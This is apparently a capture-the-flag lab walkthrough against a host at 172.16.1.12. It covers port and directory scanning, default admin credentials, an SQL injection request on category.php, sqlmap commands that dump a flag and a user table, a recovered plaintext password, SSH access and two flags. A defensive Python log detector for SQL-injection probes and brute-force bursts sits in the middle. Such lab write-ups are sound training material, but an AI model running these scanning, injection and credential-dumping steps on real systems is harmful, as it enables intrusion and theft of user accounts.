rustscan -a 172.16.1.12 --ulimit 5000 -- -Pn -sV --script "'vuln'"
Open 172.16.1.12:22
Open 172.16.1.12:21
Open 172.16.1.12:80
Open 172.16.1.12:443
Open 172.16.1.12:3306
80/tcp open http syn-ack Apache httpd 2.4.43 ((Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11 Perl/v5.30.3)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-server-header: Apache/2.4.43 (Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11 Perl/v5.30.3
| http-enum:
| /blog/: Blog
| /icons/: Potentially interesting folder w/ directory listing
| /img/: Potentially interesting folder w/ directory listing
|_ /webalizer/: Potentially interesting folder w/ directory listing
- No anonymous login with FTP
Feroxbuster
[####################] - 54s 2163872/2163872 0s found:75554 errors:522470
[####################] - 46s 120000/120000 2555/s http://172.16.1.12/
[####################] - 0s 120000/120000 0/s http://172.16.1.12/img/ => Directory listing
[####################] - 46s 120000/120000 2601/s http://172.16.1.12/blog/
[####################] - 6s 120000/120000 0/s http://172.16.1.12/blog/js/ => Directory listing
[####################] - 7s 120000/120000 0/s http://172.16.1.12/blog/images/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/blog/database/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/blog/css/ => Directory listing
[####################] - 43s 120000/120000 2737/s http://172.16.1.12/blog/blogadmin/images/
[####################] - 50s 120000/120000 2625/s http://172.16.1.12/blog/blogadmin/
[####################] - 5s 120000/120000 0/s http://172.16.1.12/blog/blogadmin/js/ => Directory listing
[####################] - 5s 120000/120000 0/s http://172.16.1.12/blog/blogadmin/css/ => Directory listing
[####################] - 43s 120000/120000 2745/s http://172.16.1.12/blog/blogadmin/admin/
[####################] - 0s 120000/120000 0/s http://172.16.1.12/webalizer/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/blog/libs/ => Directory listing
[####################] - 40s 120000/120000 2998/s http://172.16.1.12/blog/blogadmin/templates/
[####################] - 0s 120000/120000 0/s http://172.16.1.12/blog/blogadmin/resources/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/blog/blogadmin/libs/ => Directory listing
[####################] - 38s 120000/120000 3106/s http://172.16.1.12/dashboard/
[####################] - 3s 120000/120000 0/s http://172.16.1.12/blog/blogadmin/font-awesome/ => Directory listing
[####################] - 6s 120000/120000 0/s http://172.16.1.12/dashboard/images/ => Directory listing
[####################] - 34s 120000/120000 0/s http://172.16.1.12/dashboard/docs/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/dashboard/stylesheets/ => Directory listing
[####################] - 38s 120000/120000 3141/s http://172.16.1.12/dashboard/de/
[####################] - 37s 120000/120000 3165/s http://172.16.1.12/dashboard/fr/
[####################] - 37s 120000/120000 3204/s http://172.16.1.12/dashboard/es/
[####################] - 37s 120000/120000 3211/s http://172.16.1.12/dashboard/ru/
[####################] - 37s 120000/120000 3210/s http://172.16.1.12/dashboard/it/
[####################] - 34s 120000/120000 3481/s http://172.16.1.12/dashboard/pl/
[####################] - 0s 120000/120000 0/s http://172.16.1.12/dashboard/javascripts/ => Directory listing
[####################] - 34s 120000/120000 3525/s http://172.16.1.12/blog/blogadmin/hooks/
[####################] - 1s 120000/120000 0/s http://172.16.1.12/dashboard/images/addons/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/dashboard/images/stamps/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/dashboard/images/bitnami-xampp/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/dashboard/images/team/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/dashboard/images/screenshots/ => Directory listing
[####################] - 1s 120000/120000 0/s http://172.16.1.12/dashboard/images/blog/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/dashboard/images/flags/ => Directory listing
[####################] - 31s 120000/120000 3758/s http://172.16.1.12/dashboard/ro/
[####################] - 31s 120000/120000 3760/s http://172.16.1.12/dashboard/tr/
[####################] - 31s 120000/120000 3865/s http://172.16.1.12/dashboard/hu/
[####################] - 2s 120000/120000 0/s http://172.16.1.12/dashboard/docs/images/ => Directory listing
[####################] - 18s 120000/120000 6581/s http://172.16.1.12/dashboard/jp/
- Found a blog app running AppGini with default admin/admin creds.
- Found SQL injection in the request:
GET /blog/category.php?id=%27 HTTP/1.1
Host: 172.16.1.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: BLOG_ADMIN=c44bee64e8a111f74362795e536dbab5; columns%2Fblog%2Fblogadmin%2Fblog_categories_view.php={%22blog_categories-name%22:true}
Upgrade-Insecure-Requests: 1
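Seen from the other side, both the Feroxbuster run and the category.php?id=%27 probe above leave a clear trace in the Apache access log. The following detector is an added example, not part of these notes or of the target application; the log lines are constructed, and the 404 threshold is an assumption.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-log sample (not from the page's target): one normal request,
# two SQL-injection probes against /blog/category.php?id, and a 60-request 404 burst.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /blog/category.php?id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /blog/category.php?id=%27 HTTP/1.1" 500 812 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /blog/category.php?id=3%27%20AND%201=1--%20 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
] + [
    f'10.0.0.7 - - [01/Jan/2024:10:01:{i:02d} +0000] "GET /w{i} HTTP/1.1" 404 196 "-" "Mozilla/5.0"'
    for i in range(60)
])

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Decoded parameter values carrying a quote, a SQL comment opener or a common SQL keyword.
SQLI_TOKEN = re.compile(r"""['"]|--|/\*|\b(union|select|sleep|benchmark)\b""", re.IGNORECASE)

def parse_line(line):
    """Split one combined-log line into its fields; return None for unparsable lines."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec

def sqli_params(target):
    """Return (param, decoded value) pairs whose percent-decoded value looks like a SQL probe."""
    query = urlsplit(target).query  # the log keeps the request as sent, so %27 must be decoded first
    return [(n, v) for n, v in parse_qsl(query, keep_blank_values=True) if SQLI_TOKEN.search(v)]

def analyse(log_text, not_found_threshold=50):
    """Return (ip, path, param, value) SQLi findings and IPs whose 404 count reaches the threshold."""
    findings, not_found = [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["status"] == 404:  # directory brute forcing produces a burst of these per client
            not_found[rec["ip"]] += 1
        for name, value in sqli_params(rec["target"]):
            findings.append((rec["ip"], urlsplit(rec["target"]).path, name, value))
    scanners = sorted(ip for ip, n in not_found.items() if n >= not_found_threshold)
    return findings, scanners
```

Calling analyse(SAMPLE_LOG) flags the two id= probes from 10.0.0.5 and reports 10.0.0.7 as a brute-force suspect; on a real log, tune the threshold to the site's normal 404 rate.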
Flag 1
sqlmap -r req.txt -D flag -T flag --dump
Database: flag
Table: flag
[1 entry]
+------------------------------+
| flag |
+------------------------------+
| DANTE{wHy_y0U_n0_s3cURe?!?!} |
+------------------------------+
Getting password for ben
sqlmap -r req2.txt -D blog_admin_db -T membership_users --columns --dump
ben password: Welcometomyblog
single.php
SSH login
ssh ben@172.16.1.12
Flag 2
Location: /home/ben/flag.txt DANTE{Pretty_Horrific_PH4IL!}